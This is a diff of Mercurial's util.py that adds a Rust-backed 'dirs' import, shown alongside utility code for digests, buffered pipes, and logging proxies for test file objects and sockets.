rust-dirstate: call new "dirs" rust implementation from Python
Raphaël Gomès
r42738:f5ef8c85 default draft
@@ -1,3318 +1,3323 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import collections
20 20 import contextlib
21 21 import errno
22 22 import gc
23 23 import hashlib
24 24 import itertools
25 25 import mmap
26 26 import os
27 27 import platform as pyplatform
28 28 import re as remod
29 29 import shutil
30 30 import socket
31 31 import stat
32 32 import sys
33 33 import time
34 34 import traceback
35 35 import warnings
36 36
37 37 from .thirdparty import (
38 38 attr,
39 39 )
40 40 from hgdemandimport import tracing
41 41 from . import (
42 42 encoding,
43 43 error,
44 44 i18n,
45 45 node as nodemod,
46 46 policy,
47 47 pycompat,
48 48 urllibcompat,
49 49 )
50 50 from .utils import (
51 51 compression,
52 52 procutil,
53 53 stringutil,
54 54 )
55 55
56 rustdirs = policy.importrust('dirstate', 'Dirs')
57
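# Illustrative sketch: policy.importrust returns None when the compiled
# Rust extension is unavailable, so callers are expected to test for
# that and fall back to the pure-Python implementation ('pydirs' below
# is a hypothetical stand-in for the Python dirs class):
#
#   def getdirs(map, skip=None):
#       if rustdirs is not None:
#           return rustdirs(map, skip)
#       return pydirs(map, skip)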
56 58 base85 = policy.importmod(r'base85')
57 59 osutil = policy.importmod(r'osutil')
58 60 parsers = policy.importmod(r'parsers')
59 61
60 62 b85decode = base85.b85decode
61 63 b85encode = base85.b85encode
62 64
63 65 cookielib = pycompat.cookielib
64 66 httplib = pycompat.httplib
65 67 pickle = pycompat.pickle
66 68 safehasattr = pycompat.safehasattr
67 69 socketserver = pycompat.socketserver
68 70 bytesio = pycompat.bytesio
69 71 # TODO deprecate stringio name, as it is a lie on Python 3.
70 72 stringio = bytesio
71 73 xmlrpclib = pycompat.xmlrpclib
72 74
73 75 httpserver = urllibcompat.httpserver
74 76 urlerr = urllibcompat.urlerr
75 77 urlreq = urllibcompat.urlreq
76 78
77 79 # workaround for win32mbcs
78 80 _filenamebytestr = pycompat.bytestr
79 81
80 82 if pycompat.iswindows:
81 83 from . import windows as platform
82 84 else:
83 85 from . import posix as platform
84 86
85 87 _ = i18n._
86 88
87 89 bindunixsocket = platform.bindunixsocket
88 90 cachestat = platform.cachestat
89 91 checkexec = platform.checkexec
90 92 checklink = platform.checklink
91 93 copymode = platform.copymode
92 94 expandglobs = platform.expandglobs
93 95 getfsmountpoint = platform.getfsmountpoint
94 96 getfstype = platform.getfstype
95 97 groupmembers = platform.groupmembers
96 98 groupname = platform.groupname
97 99 isexec = platform.isexec
98 100 isowner = platform.isowner
99 101 listdir = osutil.listdir
100 102 localpath = platform.localpath
101 103 lookupreg = platform.lookupreg
102 104 makedir = platform.makedir
103 105 nlinks = platform.nlinks
104 106 normpath = platform.normpath
105 107 normcase = platform.normcase
106 108 normcasespec = platform.normcasespec
107 109 normcasefallback = platform.normcasefallback
108 110 openhardlinks = platform.openhardlinks
109 111 oslink = platform.oslink
110 112 parsepatchoutput = platform.parsepatchoutput
111 113 pconvert = platform.pconvert
112 114 poll = platform.poll
113 115 posixfile = platform.posixfile
114 116 readlink = platform.readlink
115 117 rename = platform.rename
116 118 removedirs = platform.removedirs
117 119 samedevice = platform.samedevice
118 120 samefile = platform.samefile
119 121 samestat = platform.samestat
120 122 setflags = platform.setflags
121 123 split = platform.split
122 124 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
123 125 statisexec = platform.statisexec
124 126 statislink = platform.statislink
125 127 umask = platform.umask
126 128 unlink = platform.unlink
127 129 username = platform.username
128 130
129 131 # small compat layer
130 132 compengines = compression.compengines
131 133 SERVERROLE = compression.SERVERROLE
132 134 CLIENTROLE = compression.CLIENTROLE
133 135
134 136 try:
135 137 recvfds = osutil.recvfds
136 138 except AttributeError:
137 139 pass
138 140
139 141 # Python compatibility
140 142
141 143 _notset = object()
142 144
143 145 def bitsfrom(container):
144 146 bits = 0
145 147 for bit in container:
146 148 bits |= bit
147 149 return bits
148 150
149 151 # Python 2.6 still has deprecation warnings enabled by default. We do not
150 152 # want to display anything to the standard user, so detect if we are running
151 153 # tests and only use Python deprecation warnings in this case.
152 154 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
153 155 if _dowarn:
154 156 # explicitly unfilter our warning for python 2.7
155 157 #
156 158 # The option of setting PYTHONWARNINGS in the test runner was investigated.
157 159 # However, the module name set through PYTHONWARNINGS is matched exactly, so
158 160 # we cannot set 'mercurial' and have it match e.g. 'mercurial.scmutil'. This
159 161 # makes the whole PYTHONWARNINGS approach useless for our use case.
160 162 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
161 163 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
162 164 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
163 165 if _dowarn and pycompat.ispy3:
164 166 # silence warning emitted by passing user string to re.sub()
165 167 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
166 168 r'mercurial')
167 169 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
168 170 DeprecationWarning, r'mercurial')
169 171 # TODO: reinvent imp.is_frozen()
170 172 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
171 173 DeprecationWarning, r'mercurial')
172 174
173 175 def nouideprecwarn(msg, version, stacklevel=1):
174 176 """Issue an python native deprecation warning
175 177
176 178 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
177 179 """
178 180 if _dowarn:
179 181 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
180 182 " update your code.)") % version
181 183 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
182 184
183 185 DIGESTS = {
184 186 'md5': hashlib.md5,
185 187 'sha1': hashlib.sha1,
186 188 'sha512': hashlib.sha512,
187 189 }
188 190 # List of digest types from strongest to weakest
189 191 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
190 192
191 193 for k in DIGESTS_BY_STRENGTH:
192 194 assert k in DIGESTS
193 195
194 196 class digester(object):
195 197 """helper to compute digests.
196 198
197 199 This helper can be used to compute one or more digests given their name.
198 200
199 201 >>> d = digester([b'md5', b'sha1'])
200 202 >>> d.update(b'foo')
201 203 >>> [k for k in sorted(d)]
202 204 ['md5', 'sha1']
203 205 >>> d[b'md5']
204 206 'acbd18db4cc2f85cedef654fccc4a4d8'
205 207 >>> d[b'sha1']
206 208 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
207 209 >>> digester.preferred([b'md5', b'sha1'])
208 210 'sha1'
209 211 """
210 212
211 213 def __init__(self, digests, s=''):
212 214 self._hashes = {}
213 215 for k in digests:
214 216 if k not in DIGESTS:
215 217 raise error.Abort(_('unknown digest type: %s') % k)
216 218 self._hashes[k] = DIGESTS[k]()
217 219 if s:
218 220 self.update(s)
219 221
220 222 def update(self, data):
221 223 for h in self._hashes.values():
222 224 h.update(data)
223 225
224 226 def __getitem__(self, key):
225 227 if key not in DIGESTS:
226 228 raise error.Abort(_('unknown digest type: %s') % key)
227 229 return nodemod.hex(self._hashes[key].digest())
228 230
229 231 def __iter__(self):
230 232 return iter(self._hashes)
231 233
232 234 @staticmethod
233 235 def preferred(supported):
234 236 """returns the strongest digest type in both supported and DIGESTS."""
235 237
236 238 for k in DIGESTS_BY_STRENGTH:
237 239 if k in supported:
238 240 return k
239 241 return None
240 242
241 243 class digestchecker(object):
242 244 """file handle wrapper that additionally checks content against a given
243 245 size and digests.
244 246
245 247 d = digestchecker(fh, size, {'md5': '...'})
246 248
247 249 When multiple digests are given, all of them are validated.
248 250 """
249 251
250 252 def __init__(self, fh, size, digests):
251 253 self._fh = fh
252 254 self._size = size
253 255 self._got = 0
254 256 self._digests = dict(digests)
255 257 self._digester = digester(self._digests.keys())
256 258
257 259 def read(self, length=-1):
258 260 content = self._fh.read(length)
259 261 self._digester.update(content)
260 262 self._got += len(content)
261 263 return content
262 264
263 265 def validate(self):
264 266 if self._size != self._got:
265 267 raise error.Abort(_('size mismatch: expected %d, got %d') %
266 268 (self._size, self._got))
267 269 for k, v in self._digests.items():
268 270 if v != self._digester[k]:
269 271 # i18n: first parameter is a digest name
270 272 raise error.Abort(_('%s mismatch: expected %s, got %s') %
271 273 (k, v, self._digester[k]))
272 274
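# Illustrative sketch of digestchecker usage ('fh', 'size' and
# 'expected' are made up for the example):
#
#   d = digestchecker(fh, size, {'sha1': expected})
#   while d.read(4096):
#       pass
#   d.validate()   # raises error.Abort on a size or digest mismatch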
273 275 try:
274 276 buffer = buffer
275 277 except NameError:
276 278 def buffer(sliceable, offset=0, length=None):
277 279 if length is not None:
278 280 return memoryview(sliceable)[offset:offset + length]
279 281 return memoryview(sliceable)[offset:]
280 282
281 283 _chunksize = 4096
282 284
283 285 class bufferedinputpipe(object):
284 286 """a manually buffered input pipe
285 287
286 288 Python will not let us use buffered IO and lazy reading with 'polling' at
287 289 the same time. We cannot probe the buffer state and select will not detect
288 290 that data are ready to read if they are already buffered.
289 291
290 292 This class lets us work around that by implementing its own buffering
291 293 (allowing efficient readline) while offering a way to know if the buffer is
292 294 empty from the output (allowing collaboration of the buffer with polling).
293 295
294 296 This class lives in the 'util' module because it makes use of the 'os'
295 297 module from the python stdlib.
296 298 """
297 299 def __new__(cls, fh):
298 300 # If we receive a fileobjectproxy, we need to use a variation of this
299 301 # class that notifies observers about activity.
300 302 if isinstance(fh, fileobjectproxy):
301 303 cls = observedbufferedinputpipe
302 304
303 305 return super(bufferedinputpipe, cls).__new__(cls)
304 306
305 307 def __init__(self, input):
306 308 self._input = input
307 309 self._buffer = []
308 310 self._eof = False
309 311 self._lenbuf = 0
310 312
311 313 @property
312 314 def hasbuffer(self):
313 315 """True is any data is currently buffered
314 316
315 317 This will be used externally as a pre-step for polling IO. If there is
316 318 already buffered data then no polling should be set in place."""
317 319 return bool(self._buffer)
318 320
319 321 @property
320 322 def closed(self):
321 323 return self._input.closed
322 324
323 325 def fileno(self):
324 326 return self._input.fileno()
325 327
326 328 def close(self):
327 329 return self._input.close()
328 330
329 331 def read(self, size):
330 332 while (not self._eof) and (self._lenbuf < size):
331 333 self._fillbuffer()
332 334 return self._frombuffer(size)
333 335
334 336 def unbufferedread(self, size):
335 337 if not self._eof and self._lenbuf == 0:
336 338 self._fillbuffer(max(size, _chunksize))
337 339 return self._frombuffer(min(self._lenbuf, size))
338 340
339 341 def readline(self, *args, **kwargs):
340 342 if len(self._buffer) > 1:
341 343 # this should not happen because both read and readline end with a
342 344 # _frombuffer call that collapses it.
343 345 self._buffer = [''.join(self._buffer)]
344 346 self._lenbuf = len(self._buffer[0])
345 347 lfi = -1
346 348 if self._buffer:
347 349 lfi = self._buffer[-1].find('\n')
348 350 while (not self._eof) and lfi < 0:
349 351 self._fillbuffer()
350 352 if self._buffer:
351 353 lfi = self._buffer[-1].find('\n')
352 354 size = lfi + 1
353 355 if lfi < 0: # end of file
354 356 size = self._lenbuf
355 357 elif len(self._buffer) > 1:
356 358 # we need to take previous chunks into account
357 359 size += self._lenbuf - len(self._buffer[-1])
358 360 return self._frombuffer(size)
359 361
360 362 def _frombuffer(self, size):
361 363 """return at most 'size' data from the buffer
362 364
363 365 The data are removed from the buffer."""
364 366 if size == 0 or not self._buffer:
365 367 return ''
366 368 buf = self._buffer[0]
367 369 if len(self._buffer) > 1:
368 370 buf = ''.join(self._buffer)
369 371
370 372 data = buf[:size]
371 373 buf = buf[len(data):]
372 374 if buf:
373 375 self._buffer = [buf]
374 376 self._lenbuf = len(buf)
375 377 else:
376 378 self._buffer = []
377 379 self._lenbuf = 0
378 380 return data
379 381
380 382 def _fillbuffer(self, size=_chunksize):
381 383 """read data to the buffer"""
382 384 data = os.read(self._input.fileno(), size)
383 385 if not data:
384 386 self._eof = True
385 387 else:
386 388 self._lenbuf += len(data)
387 389 self._buffer.append(data)
388 390
389 391 return data
390 392
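# Illustrative sketch: cooperating with select-based polling; hasbuffer
# tells the caller whether polling is needed at all ('proc' stands in
# for a hypothetical subprocess):
#
#   import select
#   pipe = bufferedinputpipe(proc.stdout)
#   if not pipe.hasbuffer:
#       select.select([pipe.fileno()], [], [])
#   line = pipe.readline()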
391 393 def mmapread(fp):
392 394 try:
393 395 fd = getattr(fp, 'fileno', lambda: fp)()
394 396 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
395 397 except ValueError:
396 398 # Empty files cannot be mmapped, but mmapread should still work. Check
397 399 # if the file is empty, and if so, return an empty buffer.
398 400 if os.fstat(fd).st_size == 0:
399 401 return ''
400 402 raise
401 403
402 404 class fileobjectproxy(object):
403 405 """A proxy around file objects that tells a watcher when events occur.
404 406
405 407 This type is intended to only be used for testing purposes. Think hard
406 408 before using it in important code.
407 409 """
408 410 __slots__ = (
409 411 r'_orig',
410 412 r'_observer',
411 413 )
412 414
413 415 def __init__(self, fh, observer):
414 416 object.__setattr__(self, r'_orig', fh)
415 417 object.__setattr__(self, r'_observer', observer)
416 418
417 419 def __getattribute__(self, name):
418 420 ours = {
419 421 r'_observer',
420 422
421 423 # IOBase
422 424 r'close',
423 425 # closed is a property
424 426 r'fileno',
425 427 r'flush',
426 428 r'isatty',
427 429 r'readable',
428 430 r'readline',
429 431 r'readlines',
430 432 r'seek',
431 433 r'seekable',
432 434 r'tell',
433 435 r'truncate',
434 436 r'writable',
435 437 r'writelines',
436 438 # RawIOBase
437 439 r'read',
438 440 r'readall',
439 441 r'readinto',
440 442 r'write',
441 443 # BufferedIOBase
442 444 # raw is a property
443 445 r'detach',
444 446 # read defined above
445 447 r'read1',
446 448 # readinto defined above
447 449 # write defined above
448 450 }
449 451
450 452 # We only observe some methods.
451 453 if name in ours:
452 454 return object.__getattribute__(self, name)
453 455
454 456 return getattr(object.__getattribute__(self, r'_orig'), name)
455 457
456 458 def __nonzero__(self):
457 459 return bool(object.__getattribute__(self, r'_orig'))
458 460
459 461 __bool__ = __nonzero__
460 462
461 463 def __delattr__(self, name):
462 464 return delattr(object.__getattribute__(self, r'_orig'), name)
463 465
464 466 def __setattr__(self, name, value):
465 467 return setattr(object.__getattribute__(self, r'_orig'), name, value)
466 468
467 469 def __iter__(self):
468 470 return object.__getattribute__(self, r'_orig').__iter__()
469 471
470 472 def _observedcall(self, name, *args, **kwargs):
471 473 # Call the original object.
472 474 orig = object.__getattribute__(self, r'_orig')
473 475 res = getattr(orig, name)(*args, **kwargs)
474 476
475 477 # Call a method on the observer of the same name with arguments
476 478 # so it can react, log, etc.
477 479 observer = object.__getattribute__(self, r'_observer')
478 480 fn = getattr(observer, name, None)
479 481 if fn:
480 482 fn(res, *args, **kwargs)
481 483
482 484 return res
483 485
484 486 def close(self, *args, **kwargs):
485 487 return object.__getattribute__(self, r'_observedcall')(
486 488 r'close', *args, **kwargs)
487 489
488 490 def fileno(self, *args, **kwargs):
489 491 return object.__getattribute__(self, r'_observedcall')(
490 492 r'fileno', *args, **kwargs)
491 493
492 494 def flush(self, *args, **kwargs):
493 495 return object.__getattribute__(self, r'_observedcall')(
494 496 r'flush', *args, **kwargs)
495 497
496 498 def isatty(self, *args, **kwargs):
497 499 return object.__getattribute__(self, r'_observedcall')(
498 500 r'isatty', *args, **kwargs)
499 501
500 502 def readable(self, *args, **kwargs):
501 503 return object.__getattribute__(self, r'_observedcall')(
502 504 r'readable', *args, **kwargs)
503 505
504 506 def readline(self, *args, **kwargs):
505 507 return object.__getattribute__(self, r'_observedcall')(
506 508 r'readline', *args, **kwargs)
507 509
508 510 def readlines(self, *args, **kwargs):
509 511 return object.__getattribute__(self, r'_observedcall')(
510 512 r'readlines', *args, **kwargs)
511 513
512 514 def seek(self, *args, **kwargs):
513 515 return object.__getattribute__(self, r'_observedcall')(
514 516 r'seek', *args, **kwargs)
515 517
516 518 def seekable(self, *args, **kwargs):
517 519 return object.__getattribute__(self, r'_observedcall')(
518 520 r'seekable', *args, **kwargs)
519 521
520 522 def tell(self, *args, **kwargs):
521 523 return object.__getattribute__(self, r'_observedcall')(
522 524 r'tell', *args, **kwargs)
523 525
524 526 def truncate(self, *args, **kwargs):
525 527 return object.__getattribute__(self, r'_observedcall')(
526 528 r'truncate', *args, **kwargs)
527 529
528 530 def writable(self, *args, **kwargs):
529 531 return object.__getattribute__(self, r'_observedcall')(
530 532 r'writable', *args, **kwargs)
531 533
532 534 def writelines(self, *args, **kwargs):
533 535 return object.__getattribute__(self, r'_observedcall')(
534 536 r'writelines', *args, **kwargs)
535 537
536 538 def read(self, *args, **kwargs):
537 539 return object.__getattribute__(self, r'_observedcall')(
538 540 r'read', *args, **kwargs)
539 541
540 542 def readall(self, *args, **kwargs):
541 543 return object.__getattribute__(self, r'_observedcall')(
542 544 r'readall', *args, **kwargs)
543 545
544 546 def readinto(self, *args, **kwargs):
545 547 return object.__getattribute__(self, r'_observedcall')(
546 548 r'readinto', *args, **kwargs)
547 549
548 550 def write(self, *args, **kwargs):
549 551 return object.__getattribute__(self, r'_observedcall')(
550 552 r'write', *args, **kwargs)
551 553
552 554 def detach(self, *args, **kwargs):
553 555 return object.__getattribute__(self, r'_observedcall')(
554 556 r'detach', *args, **kwargs)
555 557
556 558 def read1(self, *args, **kwargs):
557 559 return object.__getattribute__(self, r'_observedcall')(
558 560 r'read1', *args, **kwargs)
559 561
560 562 class observedbufferedinputpipe(bufferedinputpipe):
561 563 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
562 564
563 565 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
564 566 bypass ``fileobjectproxy``. Because of this, we need to make
565 567 ``bufferedinputpipe`` aware of these operations.
566 568
567 569 This variation of ``bufferedinputpipe`` can notify observers about
568 570 ``os.read()`` events. It also re-publishes other events, such as
569 571 ``read()`` and ``readline()``.
570 572 """
571 573 def _fillbuffer(self):
572 574 res = super(observedbufferedinputpipe, self)._fillbuffer()
573 575
574 576 fn = getattr(self._input._observer, r'osread', None)
575 577 if fn:
576 578 fn(res, _chunksize)
577 579
578 580 return res
579 581
580 582 # We use different observer methods because the operation isn't
581 583 # performed on the actual file object but on us.
582 584 def read(self, size):
583 585 res = super(observedbufferedinputpipe, self).read(size)
584 586
585 587 fn = getattr(self._input._observer, r'bufferedread', None)
586 588 if fn:
587 589 fn(res, size)
588 590
589 591 return res
590 592
591 593 def readline(self, *args, **kwargs):
592 594 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
593 595
594 596 fn = getattr(self._input._observer, r'bufferedreadline', None)
595 597 if fn:
596 598 fn(res)
597 599
598 600 return res
599 601
600 602 PROXIED_SOCKET_METHODS = {
601 603 r'makefile',
602 604 r'recv',
603 605 r'recvfrom',
604 606 r'recvfrom_into',
605 607 r'recv_into',
606 608 r'send',
607 609 r'sendall',
608 610 r'sendto',
609 611 r'setblocking',
610 612 r'settimeout',
611 613 r'gettimeout',
612 614 r'setsockopt',
613 615 }
614 616
615 617 class socketproxy(object):
616 618 """A proxy around a socket that tells a watcher when events occur.
617 619
618 620 This is like ``fileobjectproxy`` except for sockets.
619 621
620 622 This type is intended to only be used for testing purposes. Think hard
621 623 before using it in important code.
622 624 """
623 625 __slots__ = (
624 626 r'_orig',
625 627 r'_observer',
626 628 )
627 629
628 630 def __init__(self, sock, observer):
629 631 object.__setattr__(self, r'_orig', sock)
630 632 object.__setattr__(self, r'_observer', observer)
631 633
632 634 def __getattribute__(self, name):
633 635 if name in PROXIED_SOCKET_METHODS:
634 636 return object.__getattribute__(self, name)
635 637
636 638 return getattr(object.__getattribute__(self, r'_orig'), name)
637 639
638 640 def __delattr__(self, name):
639 641 return delattr(object.__getattribute__(self, r'_orig'), name)
640 642
641 643 def __setattr__(self, name, value):
642 644 return setattr(object.__getattribute__(self, r'_orig'), name, value)
643 645
644 646 def __nonzero__(self):
645 647 return bool(object.__getattribute__(self, r'_orig'))
646 648
647 649 __bool__ = __nonzero__
648 650
649 651 def _observedcall(self, name, *args, **kwargs):
650 652 # Call the original object.
651 653 orig = object.__getattribute__(self, r'_orig')
652 654 res = getattr(orig, name)(*args, **kwargs)
653 655
654 656 # Call a method on the observer of the same name with arguments
655 657 # so it can react, log, etc.
656 658 observer = object.__getattribute__(self, r'_observer')
657 659 fn = getattr(observer, name, None)
658 660 if fn:
659 661 fn(res, *args, **kwargs)
660 662
661 663 return res
662 664
663 665 def makefile(self, *args, **kwargs):
664 666 res = object.__getattribute__(self, r'_observedcall')(
665 667 r'makefile', *args, **kwargs)
666 668
667 669 # The file object may be used for I/O. So we turn it into a
668 670 # proxy using our observer.
669 671 observer = object.__getattribute__(self, r'_observer')
670 672 return makeloggingfileobject(observer.fh, res, observer.name,
671 673 reads=observer.reads,
672 674 writes=observer.writes,
673 675 logdata=observer.logdata,
674 676 logdataapis=observer.logdataapis)
675 677
676 678 def recv(self, *args, **kwargs):
677 679 return object.__getattribute__(self, r'_observedcall')(
678 680 r'recv', *args, **kwargs)
679 681
680 682 def recvfrom(self, *args, **kwargs):
681 683 return object.__getattribute__(self, r'_observedcall')(
682 684 r'recvfrom', *args, **kwargs)
683 685
684 686 def recvfrom_into(self, *args, **kwargs):
685 687 return object.__getattribute__(self, r'_observedcall')(
686 688 r'recvfrom_into', *args, **kwargs)
687 689
688 690 def recv_into(self, *args, **kwargs):
689 691 return object.__getattribute__(self, r'_observedcall')(
690 692 r'recv_into', *args, **kwargs)
691 693
692 694 def send(self, *args, **kwargs):
693 695 return object.__getattribute__(self, r'_observedcall')(
694 696 r'send', *args, **kwargs)
695 697
696 698 def sendall(self, *args, **kwargs):
697 699 return object.__getattribute__(self, r'_observedcall')(
698 700 r'sendall', *args, **kwargs)
699 701
700 702 def sendto(self, *args, **kwargs):
701 703 return object.__getattribute__(self, r'_observedcall')(
702 704 r'sendto', *args, **kwargs)
703 705
704 706 def setblocking(self, *args, **kwargs):
705 707 return object.__getattribute__(self, r'_observedcall')(
706 708 r'setblocking', *args, **kwargs)
707 709
708 710 def settimeout(self, *args, **kwargs):
709 711 return object.__getattribute__(self, r'_observedcall')(
710 712 r'settimeout', *args, **kwargs)
711 713
712 714 def gettimeout(self, *args, **kwargs):
713 715 return object.__getattribute__(self, r'_observedcall')(
714 716 r'gettimeout', *args, **kwargs)
715 717
716 718 def setsockopt(self, *args, **kwargs):
717 719 return object.__getattribute__(self, r'_observedcall')(
718 720 r'setsockopt', *args, **kwargs)
719 721
720 722 class baseproxyobserver(object):
721 723 def _writedata(self, data):
722 724 if not self.logdata:
723 725 if self.logdataapis:
724 726 self.fh.write('\n')
725 727 self.fh.flush()
726 728 return
727 729
728 730 # Simple case writes all data on a single line.
729 731 if b'\n' not in data:
730 732 if self.logdataapis:
731 733 self.fh.write(': %s\n' % stringutil.escapestr(data))
732 734 else:
733 735 self.fh.write('%s> %s\n'
734 736 % (self.name, stringutil.escapestr(data)))
735 737 self.fh.flush()
736 738 return
737 739
738 740 # Data with newlines is written to multiple lines.
739 741 if self.logdataapis:
740 742 self.fh.write(':\n')
741 743
742 744 lines = data.splitlines(True)
743 745 for line in lines:
744 746 self.fh.write('%s> %s\n'
745 747 % (self.name, stringutil.escapestr(line)))
746 748 self.fh.flush()
747 749
748 750 class fileobjectobserver(baseproxyobserver):
749 751 """Logs file object activity."""
750 752 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
751 753 logdataapis=True):
752 754 self.fh = fh
753 755 self.name = name
754 756 self.logdata = logdata
755 757 self.logdataapis = logdataapis
756 758 self.reads = reads
757 759 self.writes = writes
758 760
759 761 def read(self, res, size=-1):
760 762 if not self.reads:
761 763 return
762 764 # Python 3 can return None from reads at EOF instead of empty strings.
763 765 if res is None:
764 766 res = ''
765 767
766 768 if size == -1 and res == '':
767 769 # Suppress pointless read(-1) calls that return
768 770 # nothing. These happen _a lot_ on Python 3, and there
769 771 # doesn't seem to be a better workaround to have matching
770 772 # Python 2 and 3 behavior. :(
771 773 return
772 774
773 775 if self.logdataapis:
774 776 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
775 777
776 778 self._writedata(res)
777 779
778 780 def readline(self, res, limit=-1):
779 781 if not self.reads:
780 782 return
781 783
782 784 if self.logdataapis:
783 785 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
784 786
785 787 self._writedata(res)
786 788
787 789 def readinto(self, res, dest):
788 790 if not self.reads:
789 791 return
790 792
791 793 if self.logdataapis:
792 794 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
793 795 res))
794 796
795 797 data = dest[0:res] if res is not None else b''
796 798
797 799 # _writedata() uses "in" operator and is confused by memoryview because
798 800 # characters are ints on Python 3.
799 801 if isinstance(data, memoryview):
800 802 data = data.tobytes()
801 803
802 804 self._writedata(data)
803 805
804 806 def write(self, res, data):
805 807 if not self.writes:
806 808 return
807 809
808 810 # Python 2 returns None from some write() calls. Python 3 (reasonably)
809 811 # returns the integer bytes written.
810 812 if res is None and data:
811 813 res = len(data)
812 814
813 815 if self.logdataapis:
814 816 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
815 817
816 818 self._writedata(data)
817 819
818 820 def flush(self, res):
819 821 if not self.writes:
820 822 return
821 823
822 824 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
823 825
824 826 # For observedbufferedinputpipe.
825 827 def bufferedread(self, res, size):
826 828 if not self.reads:
827 829 return
828 830
829 831 if self.logdataapis:
830 832 self.fh.write('%s> bufferedread(%d) -> %d' % (
831 833 self.name, size, len(res)))
832 834
833 835 self._writedata(res)
834 836
835 837 def bufferedreadline(self, res):
836 838 if not self.reads:
837 839 return
838 840
839 841 if self.logdataapis:
840 842 self.fh.write('%s> bufferedreadline() -> %d' % (
841 843 self.name, len(res)))
842 844
843 845 self._writedata(res)
844 846
845 847 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
846 848 logdata=False, logdataapis=True):
847 849 """Turn a file object into a logging file object."""
848 850
849 851 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
850 852 logdata=logdata, logdataapis=logdataapis)
851 853 return fileobjectproxy(fh, observer)
852 854
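# Illustrative sketch: observing every read on a file object and
# logging it to stderr (the file name is made up for the example):
#
#   import sys
#   fh = makeloggingfileobject(sys.stderr, open('data.bin', 'rb'),
#                              b'data', logdata=True)
#   fh.read(4)   # logs something like "data> read(4) -> 4: ..."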
853 855 class socketobserver(baseproxyobserver):
854 856 """Logs socket activity."""
855 857 def __init__(self, fh, name, reads=True, writes=True, states=True,
856 858 logdata=False, logdataapis=True):
857 859 self.fh = fh
858 860 self.name = name
859 861 self.reads = reads
860 862 self.writes = writes
861 863 self.states = states
862 864 self.logdata = logdata
863 865 self.logdataapis = logdataapis
864 866
865 867 def makefile(self, res, mode=None, bufsize=None):
866 868 if not self.states:
867 869 return
868 870
869 871 self.fh.write('%s> makefile(%r, %r)\n' % (
870 872 self.name, mode, bufsize))
871 873
872 874 def recv(self, res, size, flags=0):
873 875 if not self.reads:
874 876 return
875 877
876 878 if self.logdataapis:
877 879 self.fh.write('%s> recv(%d, %d) -> %d' % (
878 880 self.name, size, flags, len(res)))
879 881 self._writedata(res)
880 882
881 883 def recvfrom(self, res, size, flags=0):
882 884 if not self.reads:
883 885 return
884 886
885 887 if self.logdataapis:
886 888 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
887 889 self.name, size, flags, len(res[0])))
888 890
889 891 self._writedata(res[0])
890 892
891 893 def recvfrom_into(self, res, buf, size, flags=0):
892 894 if not self.reads:
893 895 return
894 896
895 897 if self.logdataapis:
896 898 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
897 899 self.name, size, flags, res[0]))
898 900
899 901 self._writedata(buf[0:res[0]])
900 902
901 903 def recv_into(self, res, buf, size=0, flags=0):
902 904 if not self.reads:
903 905 return
904 906
905 907 if self.logdataapis:
906 908 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
907 909 self.name, size, flags, res))
908 910
909 911 self._writedata(buf[0:res])
910 912
911 913 def send(self, res, data, flags=0):
912 914 if not self.writes:
913 915 return
914 916
915 917 self.fh.write('%s> send(%d, %d) -> %d' % (
916 918 self.name, len(data), flags, len(res)))
917 919 self._writedata(data)
918 920
919 921 def sendall(self, res, data, flags=0):
920 922 if not self.writes:
921 923 return
922 924
923 925 if self.logdataapis:
924 926 # Returns None on success. So don't bother reporting return value.
925 927 self.fh.write('%s> sendall(%d, %d)' % (
926 928 self.name, len(data), flags))
927 929
928 930 self._writedata(data)
929 931
930 932 def sendto(self, res, data, flagsoraddress, address=None):
931 933 if not self.writes:
932 934 return
933 935
934 936 if address:
935 937 flags = flagsoraddress
936 938 else:
937 939 flags = 0
938 940
939 941 if self.logdataapis:
940 942 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
941 943 self.name, len(data), flags, address, res))
942 944
943 945 self._writedata(data)
944 946
945 947 def setblocking(self, res, flag):
946 948 if not self.states:
947 949 return
948 950
949 951 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
950 952
951 953 def settimeout(self, res, value):
952 954 if not self.states:
953 955 return
954 956
955 957 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
956 958
957 959 def gettimeout(self, res):
958 960 if not self.states:
959 961 return
960 962
961 963 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
962 964
